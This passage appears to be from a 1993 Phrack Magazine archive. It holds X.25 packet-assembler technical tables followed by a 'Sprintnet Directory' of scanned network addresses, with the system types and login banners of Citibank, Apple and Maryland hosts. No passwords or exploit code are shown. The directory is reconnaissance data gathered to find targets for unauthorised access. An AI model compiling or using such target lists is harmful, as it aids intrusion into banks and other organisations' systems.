  3762.                                        CONFIGURATION TABLES.
  3763.  
  3764.         159           E9               TIME OF DAY CLOCK
  3765.         159           E9                 1/10 SECONDS
  3766.         15A           EA                 SECONDS
  3767.         15B           EB                 MIN.
  3768.         15C           EC                 HOURS
  3769.         15D           ED                 DAYS
  3770.         15E           EE                 DAYS
  3771.  
  3772.        DCB + 3        XX               PACKET REC. STATUS BYTE#1
  3773.                                          00 = READY
  3774.                                          01 = DTE WAITING
  3775.                                          02 = DCE WAITING
  3776.                                          04 = DATA TRANSFER
  3777.                                          08 = DTE CLEAR REQUEST SENT
  3778.                                          10 = DCE CLEAR INDICATION
  3779.                                          20 = DTE RESTART REQUEST
  3780.                                          40 = DTE RESET REQUEST
  3781.                                          80 = DCE RESET INDICATION
  3782.        DCB +18        XX               POINTER TO NEXT FREE DCB
  3783.                                          VALID ONLY IF THIS IS A FREE DCB
  3784.  
  3785.   ITI SPECIFIC LCB INFORMATION
  3786.  
  3787.                     LCB+27        PHYSICAL STATUS
  3788.                                   X'00' LINE DOWN/INACTIVE
  3789.                                   X'01' LINE HAS BEEN INACTIVATED
  3790.                                   X'02' LINE IS 'BUSY OUT'
  3791.                                   X'04' LINE IS BEING ACTIVATED
  3792.                                  X'08' LINE IS ACTIVE
  3793.                                   X'10' LINE IS BEING INACTIVATED
  3794.  
  3795.                     LCB+28        TDT2 COMMAND BYTE
  3796.                                   BIT 0 = 1  BUSY LINE
  3797.                                   BIT 1 = 1  CLEAR LINE
  3798.                                   BIT 2 = 1  RESET LINE
  3799.                                   BIT 3 - 7 NOT USED
  3800.  
  3801.                     LCB+5C        # BUFFERS ALLOCATED TO THIS LINE
  3802.                     LCB+5D        DRIVER ERROR COUNTER
  3803.                     LCB+5E        NO BUFFER ERROR COUNTER
  3804.                     LCB+5F        FLOW CONTROL ERROR COUNTER
  3805.                     LCB+60        PARITY ERROR COUNTER
  3806.                     LCB+61        OVER-RUN ERROR COUNTER
  3807.                     LCB+62        FRAMING ERROR COUNTER
  3808.                     LCB+74        BREAK TIMER
  3809.                     LCB+75        RING-OUT TIMER
  3810.                     LCB+76        RING-OUT COUNTER
  3811.  
  3812.   DSP 3270 LCB SPECIFIC INFORMATION
  3813.  
  3814.                     LCB+4F        CURRENT NO. SYNC PAIRS INSERTIONS
  3815.                     LCB+50        CURRENT NO. OF ERROR RETRIES
  3816.                     LCB+51        CURRENT NO. OF NAK RETRIES
  3817.                     LCB+52        CURRENT NO. OF ENQ RETRIES
  3818.                     LCB+53        RECEIVE ACK COUNTER
  3819.                     LCB+54        TRANSMIT ACK COUNTER
  3820.                     LCB+55        CTS  DROP-ERROR COUNTER
  3821.                     LCB+56        DCD  DROP-ERROR COUNTER
  3822.                     LCB+5A        CURRENT NO. WACK'S
  3823.  
  3824.  
  3825.   X780 LCB SPECIFIC INFORMATION
  3826.  
  3827.                     LCB+4F        CURRENT NO. OF SYNC PAIR INSERTIONS
  3828.                     LCB+50        CURRENT NO. OF ERROR RETRIES
  3829.                     LCB+51        CURRENT NO. OF NACK RETRIES
  3830.                     LCB+52        CURRENT NO. OF ENQ RETRIES
  3831.                     LCB+53        RECEIVE ACK COUNTER
  3832.                     LCB+54        TRANSMIT ACK COUNTER
  3833.                     LCB+55        CTS  DROP-ERROR COUNTER
  3834.                     LCB+56        DCD  DROP-ERROR COUNTER
  3835.  
  3836.  
  3837.  COMMON DCB INFORMATION
  3838.  
  3839.                     DCB+6         BITS 5-7 PACKET SEND SEQ. NO. P(S)
  3840.                     DCB+7         BITS 5-7 PACKET REC. SEQ. NO. P(R)
  3841.                     DCB+8         LCN #
  3842.                     DCB+9         BITS 5-7 PACKET SEQ. NO. LAST CONFIRMED
  3843.                     DCB+A         BITS 5-7 PACKET SEQ. NO. LAST SENT TO NET
  3844.                     DCB+B         # PACKETS SENT
  3845.                     DCB+D         # PACKETS REC.
  3846.                     DCB+F         # RESETS SENT OR RECEIVED
  3847.                     DCB+14        # BUFFERS IN HOLD QUEUE
  3848.                     DCB+15        TIME VC WAS ESTABLISHED (SSMMHHDD)
  3849.                     DCB+31        DESTINATION NETWORK ADDRESS
  3850.  
  3851.  
  3852.  
  3853.     THE FOLLOWING IS A DESCRIPTION OF THE TP3006 X.25 INTERFACE FROM THE
  3854. SIO TO THE REAR PANEL CONNECTORS.
  3855.  
  3856.             SIO CHIP                     REAR PANEL CONNECTOR
  3857.           +--------------+
  3858.           |              |
  3859.           |        DTRB  |------------------->- DTR  20
  3860.           |        TXDB  |------------------->- TXD   2
  3861.           |        RTSA  |------------------->- LDL  13
  3862.           |        RTSB  |------------------->- RTS   4
  3863.           |        DTRA  |------------------->- LAL  19
  3864.           |        DCDA  |---<-----------+--->- CTR  18
  3865.           |              |               +---<- RLSD  8
  3866.           |        RXCA  |--+
  3867.           |        RXCB  |--+-------- ** ----<- RXC  17
  3868.           |              |                 +->- TXCE 24
  3869.           |              |            ** --+->- RXCE 11
  3870.           |        TXCA  |----+
  3871.           |        TXCB  |----+------ ** ----<- TXC  15
  3872.           |        DCDB  |----------- ** ----<- DSR   6
  3873.           |        CTSB  |-------------------<- CTS   5
  3874.           |        RXDA  |----+
  3875.           |        RXDB  |----+--------------<- RXD   3
  3876.           |        CTSA  |-------------------<- RI   22
  3877.           |              |
  3878.           +--------------+
  3879.  
  3880.                          <   INBOUND SIGNAL
  3881.                          >   OUT BOUND SIGNAL
  3882.  
  3883.     IF DSR AND TXC, THEN USE EXTERNAL CLOCKING.  IF DSR AND NO TXC,
  3884. THEN USE INTERNAL CLOCKING DERIVED FROM THE CONFIGURED LINE SPEED
  3885. PRODUCED FROM A CTC CHIP).  IF THE CLOCKING IS PRODUCED INTERNALLY,
  3886. THEN THE INTERNAL CLOCK IS ALSO PROVIDED ON PINS 11 AND 24
  3887. AT THE REAR PANEL.
  3888.  
  3889.     FOR THE TP3325, THE NETLINES ALWAYS USE THE EXTERNAL CLOCK SOURCE.
  3890. THE HARDWARE WAS CHANGED DURING REFINEMENT OF THE MOD ONE XPB.
  3891.  
  3892.     IF THE ATTACHED DEVICE IS PROVIDING CLOCKING AND THE TP3025 IS PROVIDING
  3893. CLOCKING, THE TP WILL DETECT THE CLOCKING AND WILL STOP CLOCKING. IN THE
  3894. CASE OF THE TP3025 HAVING BEEN RESET AND LOADED, IF A TP3005/3006 IS THEN
  3895. CONNECTED TO THE INTERFACE, THERE IS A RACE CONDITION WHERE THE DEVICE THAT
  3896. PROVIDES THE CLOCKING IS ARBITRARY.  THE HARDWARE LOGIC REQUIRES A RESET
  3897. TO OCCUR FOR THE TP3025 TO CHANGE PRIOR SELECTION OF 1) INTERNAL/EXTERNAL
  3898. CLOCKING AND 2) V35/RS232 INTERFACE AFTER A LOAD.
  3899.  
  3900.     THE DEBUG PORT "S" COMMAND WILL RETURN ONE HEX BYTE THAT REPRESENTS
  3901. THE DATA SET SIGNALS STATUS AT THE SIO CHIP FOR THE DEFINED LINE
  3902. (E.G. "S2" WILL RETURN THE DATA SET SIGNALS ON LINE 2).  THE UPPER HALF
  3903. OF THE BYTE IS USED TO REPRESENT THE DATA SET SIGNAL STATUS.
  3904.  
  3905.                     BIT  7  6  5  4  3  2  1  0
  3906.                          |  |  |  |  ==========
  3907.                          |  |  |  |   NOT USED
  3908.                          |  |  |  |
  3909.       DSR AT THE REAR ---+  |  |  +--- RTS AT THE REAR PANEL.
  3910.       DTR AT THE REAR  -----+  +------ CTS AT THE REAR PANEL.
  3911.  
  3912.      THE FOLLOWING IS A DESCRIPTION OF THE DEVICE INTERFACE FOR THE
  3913. SIO TO THE REAR PANEL.
  3914.  
  3915.                SIO CHIP                         REAR PANEL INTERFACE
  3916.           +--------------+
  3917.           |              |
  3918.           |          RXD | ------------------------<  2  TD
  3919.           |          TXD | ------------------------>  3  RD
  3920.           |          DCD | -<-----------+----------<  4  RTS
  3921.           |              |              +---------->  5  CTS
  3922.           |          DTR | ------------------------>  6  DSR
  3923.           |          RTS | ------------------------>  8  DCD
  3924.           |          RXC | -<--------- ** ---------< 11
  3925.           |              |  PIO DSR -- ** ---------< 20  DTR
  3926.           |              |          -- ** ---------> 15  TC
  3927.           |              |          -- **  --------> 17  RC
  3928.           |          TXC | -<--------- ** ---------< 24  TC
  3929.           |          CTS | -<----------------------< 18
  3930.           |              |
  3931.           |              |    PIO -----------------< 25
  3932.           |              |    PIO -----------------> 22
  3933.           |              |
  3934.           +--------------+
  3935.  
  3936.     WITH DTR TRUE ( PIN 20), RXC (PIN 11) IS CHECKED FOR AN INBOUND CLOCK
  3937. SIGNAL.  IF THERE IS A CLOCK SIGNAL, THEN THE SIO IS CLOCKED EXTERNALLY
  3938. FROM PIN 11 AND 24.  IF THERE IS NO CLOCK ON PIN 11 THEN AN INTERNAL CLOCK
  3939. SOURCE IS GATED TO THE SIO AND TO PIN 15 AND 17 ON THE REAR PANEL INTERFACE.
  3940.  
  3941.      THE OUTPUT OF THE DEBUG PORT 'S' COMMAND DISPLAYS ONE HEX BYTE THAT
  3942. IS A COMPOSITE OF THE DATA SET SIGNALS FROM THE PIO AND SIO CHIPS.  THE
  3943. OUTPUT BIT DEFINITIONS ARE THE SAME AS THE X.25 LINE BUT A NOTE NEEDS
  3944. TO MADE THAT THE X.25 IS A DTE INTERFACE AND THE DEVICE LINES ARE A
  3945. DCE INTERFACE.  THE UTILIZATION OF THE INBOUND RTS/CTS MAY NOT BE
  3946. REQUIRED FOR THE TP TO MAINTAIN THE INTERFACE.
  3947.  
  3948.     PINS 22 AND 25 ARE PAD DEPENDANT SO THEY MAY BE USED FOR
  3949. DIFFERENT FUNCTIONS THAN THOSE EXPECTED.
  3950.  
  3951.                    ALL NUMERIC VALUES ARE IN HEX.
  3952.                    COMMAND STRINGS CAN BE USED WHILE IN THE DEBUG PORT.
  3953.  
  3954.              ==============================================================<
  3955.              |    XCB DIRECTORY TABLE   (two bytes per entry)               >
  3956.              |  DEBUG |LOGGER| X.25 #0 | X.25 #1 | X.25 #2 | X.25 #3|.......
  3957.      L70,R24 |   DCB  |  DCB |   XCB   |   XCB   |   XCB   |  XCB   |        >
  3958.              |===============================================================>
  3959.                  |        |        |       |            |        |
  3960.                XCB#0    XCB#1  | XCB#2   XCB#3     |  XCB#4    XCB#5
  3961.                                |   |       |       |    |        |
  3962.         +->>---------------->>-+   |       |    +>>+    |        |
  3963.         |                          |       |    |       |        |
  3964.         |    +<<----------------<<-+     L76,R2 |       |      L7A,R2
  3965.         |    |                                  |       |
  3966.         |    |  L74,L,R80                       | +<<---+ L78,L,R80
  3967.         |    |                                  | |
  3968.         |    +------------->>-------------->    | +--------->>------------->
  3969.         |    |  XCB        >>              >    | | XCB     >>             >
  3970.         |    +------------->>-------------->    | +--------->>------------->
  3971.         |                       | XCB+2D        |                 | XCB+2D
  3972.         |                       |            +>>+                 |
  3973.         |    +-<<---------------+            |   +-<<-------------+
  3974.         |    |                               |   |
  3975.         |    | L(XCB+2D),L,R((MAX.LCN*3)+3)  |   | L(XCB+2D),L,R((MAX.LCN*3)+3)
  3976.         |    |                               |   |
  3977.         |    +------------------>>-------->  |   +------------------>>-------->
  3978.         |    | LCN VECTOR TABLE >> ABCCDD >  |   | LCN VECTOR TABLE >> ABCCDD >
  3979.         B    |3 BYTES PER ENTRY >> ====== >  B   |3 BYTES PER ENTRY >> ====== >
  3980.         |    +------------------>>-------->  |   +------------------>>-------->
  3981.         |                            |       |                            |
  3982.         +--CC->>  TRUNK LCNS ----->  |       +--CC->>  CONCENTRATOR LCNS  |
  3983.         |         |LCN0 |LCN1 |...   |       |         |LCN0 |LCN1 |...   |
  3984.         |                            +--->>--+                            |
  3985.         |                                                                 |
  3986.         |   THREE BYTE LCN ENTRY ==> AB CC DD                             |
  3987.         |                             = == ==                             |
  3988.         |                             | |  |                              |
  3989.         |              XCB NUMBER ----+ |  |                              |
  3990.         |              LCN NUMBER ------+  +---- LCN TIMER                |
  3991.         |                                                                 |
  3992.         |                                                                 |
  3993.         +-<<-----------------------------------------------------<<-------+
  3994.  
  3995.             **  CC IS THE LCN NUMBER IN XCB B. B IN XCB #0 WILL POINT TO
  3996.                 ==                           =  =
  3997.      XCB #4 IN THIS EXAMPLE. CC IN XCB #0 WILL GIVE THE LCN NUMBER USED IN
  3998.                              ==
  3999.      THE LCN VECTOR TABLES FOR XCB #4.
  4000.  
  4001.  
  4002.      1)   XCB OFFSETS             DEFINITION
  4003.  
  4004.            XCB + 09           CONTROL DATA SET SIGNAL STATUS
  4005.                                     BIT  4 = 1  RTS HIGH
  4006.                                          5 = 1  CTS HIGH
  4007.                                          6 = 1 DTR HIGH
  4008.                                          7 = 1 DSR HIGH
  4009.                                     THE S COMMAND RETRIEVES THIS LOC.
  4010.            XCB + 0B              POINTER TO LINE CONFIGURATION RECORD.
  4011.  
  4012.            XCB + 0E              NUMBER OF FRAMES DISCARDED.
  4013.            XCB + 0F              NUMBER OF CRC ERRORS
  4014.  
  4015.            XCB + 10              NUMBER OF REJECTS SENT
  4016.            XCB + 11              NUMBER OF REJECTS RECEIVED
  4017.  
  4018.            XCB + 12              NUMBER OF T1 TIMEOUT
  4019.  
  4020.            XCB + 13              NUMBER OF COMMAND REJECTS SENT
  4021.            XCB + 14              NUMBER OF COMMAND REJECTS RECEIVED
  4022.  
  4023.            XCB + 15              NUMBER OF DISCONNECTS SENT
  4024.            XCB + 16              NUMBER OF DISCONNECTS RECEIVED
  4025.  
  4026.            XCB + 17              NUMBER OF SET MODE SENT
  4027.            XCB + 18              NUMBER OF SET MODE RECEIVED
  4028.  
  4029.            XCB + 19              NUMBER OF FRAME OVERFLOW
  4030.  
  4031.            XCB + 1A              NUMBER OF I FRAMES SENT
  4032.            XCB + 1C              NUMBER OF I FRAMES RECEIVED
  4033.  
  4034.            XCB + 24              FLAG BYTE
  4035.                                   BIT 0 = 1   DCE-TO-DTE FLOW INIT
  4036.                                       1 = 1   DTE-TO-DCE FLOW INIT
  4037.                                       2 = 1   LINK RESET (DISC. OR SETMODE SENT
  4038.                                       3 = 1   DCE BUSY ( RNR SENT)
  4039.                                       4 = 1   IN TIMER RECOVERY
  4040.                                       5 = 1   SENT INTERNAL RESET. LAP RE-INIT.
  4041.                                       6 = 1   SET POLL BIT IN NEXT FRAME.
  4042.  
  4043.            XCB + 27              LINE STATUS
  4044.                                  BIT 0 = 1  NOT ACTIVE
  4045.                                      1 = 1  DEACTIVATED
  4046.                                      2 = 1  BUSY-OUT
  4047.                                      3 = 1  ACTIVATING
  4048.                                      4 = 1  ACTIVE
  4049.                                      5 = 1  DEACTIVATING
  4050.  
  4051.            XCB + 2B              MAX. LCN PERMITTED
  4052.            XCB + 2C              CURRENT NUMBER OF LCN IN USE
  4053.            XCB + 2D              POINTER TO THE LCN VECTOR TABLE
  4054.  
  4055.            XCB + 47              'DISABLE/ ENABLE/ CLEAR COMMAND.
  4056.                                      NOT OPERATIONAL AT VERSION 1.01.
  4057.                                    01 - BUSY
  4058.                                    02 - CLEAR BUSY
  4059.                                    04 - RESET LINE
  4060.  
  4061.      2)   LCN VECTOR TABLE.
  4062.             ( XCB + 2D ,L,A (LCN ADDRESS),R3)
  4063.                     LCN ADDRESS = (LCN * 3)
  4064.  
  4065.            LCN + 0               BITS
  4066.                                  0-3 - XCB DIRECTORY NUMBER.
  4067.                                  4   - INIT CLEAR TIMER ON
  4068.                                  5   - CLEAR INDICATION SENT
  4069.                                  6   - CALL REQUEST SENT
  4070.                                  7   - LCN ACTIVE
  4071.            LCN + 1               LCN NUMBER
  4072.                                   (SEE LCN + 0 , BITS 0-3 TO GET XCB NUMBER)
  4073.            LCN + 2               TIMER FOR LCN.
  4074.  
  4075.  
  4076.  
  4077.  
  4078. Date:     Wed Mar 24, 1993  7:04 am  PST
  4079. From:     phrack
  4080.           EMS: INTERNET / MCI ID: 376-5414
  4081.           MBX: phrack@stormking.com
  4082.  
  4083. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  4084. TO:       Proctor & Associates / MCI ID: 399-1080
  4085. TO:       Peter Nesbitt / MCI ID: 511-1312
  4086. TO:     * Berton Corson / MCI ID: 528-0397
  4087. TO:       Michael W. Carroll / MCI ID: 557-1860
  4088. TO:       Michael McMahon / MCI ID: 585-7625
  4089. TO:       Multiple recipients of list
  4090.           EMS: INTERNET / MCI ID: 376-5414
  4091.           MBX: phrack@stormking.com
  4092. Subject:  Phrack 42/9-14
  4093.  
  4094.                            ==Phrack Magazine==
  4095.  
  4096.                Volume Four, Issue Forty-Two, File 9 of 14
  4097.  
  4098.                        <Sprintnet Directory Part 2>
  4099.  
  4100.  
  4101. 224  -  Citibank  Scanneds: various
  4102.  
  4103. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4104. ---------- ----------- -------------------------------------------------
  4105. 224 1                  CITIBANK
  4106. 224 2      VAX/VMS     Global Report 
  4107. 224 4      Prime       PRIMENET 23.2.0vB PROD-A
  4108. 224 5      DECserver
  4109. 224 6                  CITIBANK CANADA-CB1
  4110. 224 10                 CITIBANK BRASIL 
  4111. 224 11                 C/C/M 
  4112. 224 12     Prime       PRIMENET 23.2.0vA OZPROD
  4113. 224 14                 C/C/M 
  4114. 224 16                 CITIBANK FRANKFURT
  4115. 224 17     DECserver 
  4116. 224 20     DECserver
  4117. 224 21
  4118. 224 22
  4119. 224 23                 CITIBANK N.A. BAHRAIN -  BOOK  SYSTEM
  4120. 224 24                 NETWORK USER VALIDATION.
  4121. 224 26                 
  4122. 224 27                 CITIBANK JOHANNESBURG
  4123. 224 30                 CITIBANK PIRAEUS
  4124. 224 31                 ADAM_COSMOS 
  4125. 224 32                 CITIBANK LONDON 
  4126. 224 33                 CITIBANK PARIS 
  4127. 224 34                 CITIBANK LONDON 
  4128. 224 35                 DUBLIN_COSMOS  
  4129. 224 36                 CITIBANK ATG - TEST8.2
  4130. 224 37
  4131. 224 38                 CITIBANK LEWISHAM 
  4132. 224 39                 CITIBANK MILAN 
  4133. 224 40
  4134. 224 41                 CITICORP/CITIBANK 
  4135. 224 42                 CITICORP/CITIBANK 
  4136. 224 43                 VIENNA_COSMOS  
  4137. 224 44                 CITIBANK LONDON 
  4138. 224 45                 NORDIC_COSMOS  
  4139. 224 46                 NORDIC_COSMOS  
  4140. 224 47                 Enter Secure Access ID -02-> 
  4141. 224 48     Prime       CONNECTED TO 03 35-50 
  4142. 224 49                 CITIBANK FRANKFURT
  4143. 224 50                 CITICORP/CITIBANK 
  4144. 224 51                 CITICORP CASH MANAGEMENT SERVICES
  4145. 224 53                 JERSEY_COSMOS
  4146. 224 55                 SIGN-ON NAO ACEITO 
  4147. 224 56     DECserver   
  4148. 224 57     VAX/VMS     
  4149. 224 61                 CITIBANK SYDNEY 
  4150. 224 62                 CITIBANK SINGAPORE 
  4151. 224 63                 CITIBANK MANILA 
  4152. 224 64     Prime
  4153. 224 65                 CITIBANK SINGAPORE
  4154. 224 68     DECserver
  4155. 224 70                 London Branch Miniswitch
  4156. 224 71                 CCM - Citi Cash Manager
  4157. 224 73     DECserver   
  4158. 224 74                 CITI CASH MANAGEMENT NETWORK 
  4159. 224 75                 IBI MIS Systems
  4160. 224 76
  4161. 224 78                 CITIBANK HONG KONG 
  4162. 224 79                 CITIBANK 
  4163. 224 80     VAX/VMS     UNAUTHORIZED ACCESS to this SYSTEM is PROHIBITED
  4164. 224 81
  4165. 224 82     Prime       PRIMENET 23.2.0vB PROD-C
  4166. 224 83     IBM 3708
  4167. 224 85
  4168. 224 86     Prime       PRIMENET 23.1.0 LATRG1
  4169. 227 87     DECserver
  4170. 224 89     Prime       PRIMENET 23.1.0 LATRG1
  4171. 224 91     Prime
  4172. 224 92     VCP-1000    Terminal Server (decserver clone)
  4173. 224 93
  4174. 224 95                 BMS==>
  4175. 224 98                 C/C/M 
  4176. 224 100                Cityswitch
  4177. 224 104                BMS==>
  4178. 224 105
  4179. 224 108
  4180. 224 110
  4181. 224 113    Prime       PRIMENET 23.1.0 LATRG2
  4182. 224 122    VAX/VMS?    Global Report from Citicorp
  4183. 224 125                PLEASE ENTER TRANSACTION ID:
  4184. 224 128    Prime       PRIMENET 23.2.0.R43 LATPRI 
  4185. 224 129
  4186. 224 130    VAX/VMS     GLOBAL TREASURY PRODUCTS
  4187. 224 132    Prime       PRIMENET 23.2.0vB PROD-B
  4188. 224 135    VAX/VMS     CMAPD - SRPC Vax Development System
  4189. 224 136    VAX/VMS     #6Node: NYF050
  4190. 224 137    HP-3000
  4191. 224 138
  4192. 224 139    VAX/VMS     (restricted access system)
  4193. 224 140    VAX/VMS               ""
  4194. 224 141                :
  4195. 224 142                C/C/M
  4196. 224 143                CITI CASH MANAGEMENT NETWORK 
  4197. 224 147                C/C/M
  4198. 224 148                CITIBANK LONDON 
  4199. 224 149                LISBON_COSMOS 
  4200. 224 150    DEC         Welcome to the DEC Gateway 
  4201. 224 153                CITI CASH MANAGEMENT NETWORK 
  4202. 224 155    Prime       PRIMENET 23.2.0vB PROD-B
  4203. 224 157    DecServer   
  4204. 224 158           
  4205. 224 159                CDS DATA PROCESSING SUPPORT
  4206. 224 160                (pad?)
  4207. 224 161    VAX/VMS
  4208. 224 162    Prime
  4209. 224 163    Prime
  4210. 224 164    Prime       PRIMENET 22.1.2 WINMIS
  4211. 224 165    GS/1        LTN>
  4212. 224 166    VAX/VMS     GLOBAL TREASURY PRODUCTS 
  4213. 224 167    VAX/VMS     GLOBAL TREASURY PRODUCTS
  4214. 224 168    VAX/VMS     Global Report from Citicorp
  4215. 224 170                ELECTRONIC CHECK MANAGER  ENTER 'ECM' 
  4216. 224 172                CitiMail II - Asia Pacific 
  4217. 224 174                PERSONNEL SERVICES & TECHNOLOGY'S DATA PABX NETWORK
  4218. 224 175                Enter T or V for TSO or M for VM/CMS.
  4219. 224 176    DECserver   
  4220. 224 177    VAX/VMS     Unauthorized Use Is Prohibited
  4221. 224 179                <<please enter logon>> 
  4222. 224 180                Citibank N.A. PUERTO RICO
  4223. 224 193                :
  4224. 224 194    VOS         CitiShare Milwaukee, Wisconsin
  4225. 224 195                Citimail II 
  4226. 224 196    Xyplex      X.25 Terminal Server   
  4227. 224 197    VAX/VMS 
  4228. 224 199
  4229. 224 200    EMULEX      TCP/LAT-Compatible Terminal Server
  4230. 224 204
  4231. 224 205    Prime
  4232. 224 207                Communications Subsystem For Interconnection
  4233. 224 210    VOS         try "list_users"
  4234. 224 211    Major-BBS   User-ID:
  4235. 224 212                Master Policy Bulletin Board
  4236. 224 213                %%%
  4237. 224 214                INDIQUE O TIPO DE TERMINAL 
  4238. 224 216    VAX/VMS     *** Unauthorized Access Prohibited ***
  4239. 224 217    Prime
  4240. 224 218    DECserver   
  4241. 224 220                CHANNEL 01/049. ENTER CHOICE: 
  4242. 224 221                BUDAPEST_COSMOS (user 63) 
  4243. 224 222
  4244. 224 223                CITIBANK SINGAPORE 
  4245. 224 227
  4246. 224 230
  4247. 224 234    VCP-1000    (decserver clone)
  4248. 224 236                CITIBANK LEWISHAM 
  4249. 224 237    DECserver
  4250. 224 300  $             CitiMail II
  4251. 224 320    VAX/VMS
  4252. 224 602    VOS         list_users
  4253. 224 700  $             CitiMail II (Asia Pacific)
  4254. 224 701    Prime       PRIMENET 23.2.0vB DEV-A 
  4255. 224 704    Prime       PRIMENET 23.2.0vB PROD-C
  4256. 224 3004               Enter destination : node.port or :SFA
  4257. 224 3006               Enter destination : node.port or :SFA
  4258. 224 3010 
  4259. 224 3013               London Branch Miniswitch
  4260. 224 3014               CONNECTED TO CITIBANK LONDON
  4261. 224 3016               BMS==>
  4262. 224 3024               BMS==>
  4263. 224 3027               Enter destination : node.port or :SFA
  4264. 224 3032               CITIBANK LONDON 
  4265. 224 3035   EMULEX      TCP/LAT-Compatible Terminal Server 
  4266. 224 3036   EMULEX      TCP/LAT-Compatible Terminal Server 
  4267. 224 3037 $             Citimail II - C.M.E.A 
  4268. 224 3038 $
  4269. 224 3039 $             Citimvs X.25 Gateway
  4270. 224 3043   VAX/VMS     UNAUTHORIZED ACCESS to this SYSTEM is PROHIBITED
  4271. 224 3047               Enter destination : node.port or :SFA
  4272. 224 3058 *
  4273. 224 3059 *
  4274. 224 3103               CITIBANK PARIS 
  4275. 224 3116               CITICORP/CITIBANK 
  4276. 224 3117   VAX/VMS     UNAUTHORIZED ACCESS TO THIS SYSTEM IS PROHIBITED 
  4277. 224 312  3 *
  4278. 224 3124               CITIBANK MILAN 
  4279. 224 3127               CITIBANK MILAN
  4280. 224 3128 *
  4281. 224 3131               CITIBANK FRANKFURT 
  4282. 224 3133               CITIBANK FRANKFURT 
  4283. 224 3230
  4284. 224 3231
  4285. 224 3235               CITICORP/CITIBANK 
  4286. 224 3236               CITICORP/CITIBANK 
  4287. 224 4022
  4288. 224 8006               Welcome to Citiswitch, HK
  4289. 224 8008   VAX/VMS     GTN gateway/Regional Billing/PCSA/CMG accpt
  4290. 224 8010
  4291. 224 8011   Unix        INFOBASE2 login:
  4292. 224 8014   Prime
  4293. 224 8018 *
  4294. 224 8022 *
  4295. 224 8023 *
  4296. 224 8026
  4297. 224 8027
  4298. 224 8030
  4299. 24 8031
  4300. 224 8033
  4301. 224 8034
  4302. 224 8035
  4303. 224 8105               ENTER RESOURCE : 
  4304. 224 8106               Global Report from Citicorp
  4305. 224 8122               CITIBANK TOKYO 
  4306. 224 8210
  4307. 224 8211               CITIBANK MANILA 
  4308. 224 8410               CITIBANK SYDNEY 
  4309. 224 8412               CITIBANK SYDNEY
  4310. 224 8414               PLEASE ENTER YOUR ID : -1->
  4311. 224 8415   EMULEX      TCP/LAT-Compatible Terminal Server
  4312. 224 8416   Prime
  4313. 224 8509               CITIBANK HONGKONG 
  4314. 224 8620
  4315. 224 8621
  4316. 224 8622
  4317. 224 8623
  4318. 224 8624
  4319. 224 8625
  4320. 224 8626
  4321. 224 8627
  4322. 224 8629
  4323. 224 8720               CITIBANK SINGAPORE 
  4324. 224 8722 *
  4325. 224 8725 $ COSMOS
  4326. 224 8730   DECserver
  4327. 224 8731               CITIBANK SINGAPORE
  4328. 224 9010   Prime
  4329. 224 9011   VAX/VMS     *** Authorized Personnel Only ***
  4330. 224 9150               CITIBANK HONGKONG
  4331.  
  4332.  
  4333.  
  4334.  
  4335. 277  -  Apple Computer Inc.  Scanned: various     
  4336.  
  4337. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4338. ---------- ----------- ------------------------------------------------- 
  4339. 277 125J   VAX/VMS     YODA  *AUTHORIZED USERS ONLY*
  4340. 277 127    VAX/VMS     Apple Canada Inc.
  4341. 277 128    VAX/VMS     For internal use only. CHATTERBOX
  4342. 277 130J   VAX/VMS     YODA  *AUTHORIZED USERS ONLY*
  4343. 277 133    ???         Apple Computer, Inc. X.25 PAD to IP/TCP/TELNET 
  4344.  
  4345.  
  4346.  
  4347.  
  4348. 301  -  Maryland  Scanned: [0 - 2000]     
  4349.  
  4350. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4351. ---------- ----------- -------------------------------------------------
  4352. 301 20                 MEDLINE
  4353. 301 21   *
  4354. 301 26     PRIME       DNAMD1 Online
  4355. 301 33     VOS         United Communications Computer Services Group
  4356. 301 35                 User Access Verification    Username:
  4357. 301 37                 MEDLINE
  4358. 301 40                 MEDLINE
  4359. 301 56                 U#=
  4360. 301 46   *
  4361. 301 54     VAX/VMS 5.2 
  4362. 301 56                 U#=
  4363. 301 77   *
  4364. 301 78   *
  4365. 301 100    VOS         United Communications Computer Services Group
  4366. 301 125    VAX/VMS     
  4367. 301 140                MEDLINE
  4368. 301 150  $ VAX/VMS
  4369. 301 165  *
  4370. 301 170    VOS         United Communications Computer Services Group
  4371. 301 253    Prime       Primecom Network 19.4Q.111 System 35
  4372. 301 254    Prime       Primecom Network 19.4Q.111 System 59
  4373. 301 307    Prime       ER!
  4374. 301 310    Prime       Primecom Network 19.4Q.106 System 51
  4375. 301 320    Prime       Primecom Network 19.4Q.111 System 53
  4376. 301 330    Prime       Primecom Network 19.4Q.111 System 30
  4377. 301 331    Prime       Primecom Network 19.4Q.111 System 31
  4378. 301 332    Prime       Primecom Network 19.4Q.111 System 32
  4379. 301 333    Prime       Primecom Network 19.4Q.111 System 33
  4380. 301 335    Prime       Primecom Network 19.4Q.111 System 35
  4381. 301 336    VAX/VMS     Welcome to VMS 4.6                   
  4382. 301 341    Prime       Primecom Network 19.4Q.111 System 41
  4383. 301 342    Prime       Primecom Network 19.4Q.111 System 42
  4384. 301 343    Prime       Primecom Network 19.4Q.111 System 43
  4385. 301 344    Prime       Primecom Network 19.4Q.111 System 44
  4386. 301 345    Prime       Primecom Network 19.4Q.111 System 45
  4387. 301 346    Prime       Primecom Network 19.4Q.111 System 46
  4388. 301 351    Prime       Primecom Network 19.4Q.111 System 95
  4389. 301 352    Prime       Primecom Network 19.4Q.111 System 52
  4390. 301 353    Prime       Primecom Network 19.4Q.111 System 53
  4391. 301 356    Prime       Primecom Network 18.4Y System 56
  4392. 301 357    Prime       Primecom Network 19.4Q.111 System 57
  4393. 301 358    Prime       Primecom Network 19.4Q.111 System 58
  4394. 301 361    Prime       Primecom Network 19.4Q.111 System 31
  4395. 301 364    Prime       Primecom Network 19.4Q.111 System 64
  4396. 301 390    Prime       Primecom Network 19.4Q.111 System 90
  4397. 301 391    Prime       Primecom Network 19.4Q.111 System 91
  4398. 301 392    Prime       Primecom Network 19.4Q.111 System 92
  4399. 301 393    Prime       Primecom Network 19.4Q.111 System 93
  4400. 301 394    Prime       Primecom Network 19.4Q.111 System 30
  4401. 301 395    Prime       Primecom Network 19.4Q.111 System 95
  4402. 301 396    Prime       Primecom Network 19.4Q.111 System 96
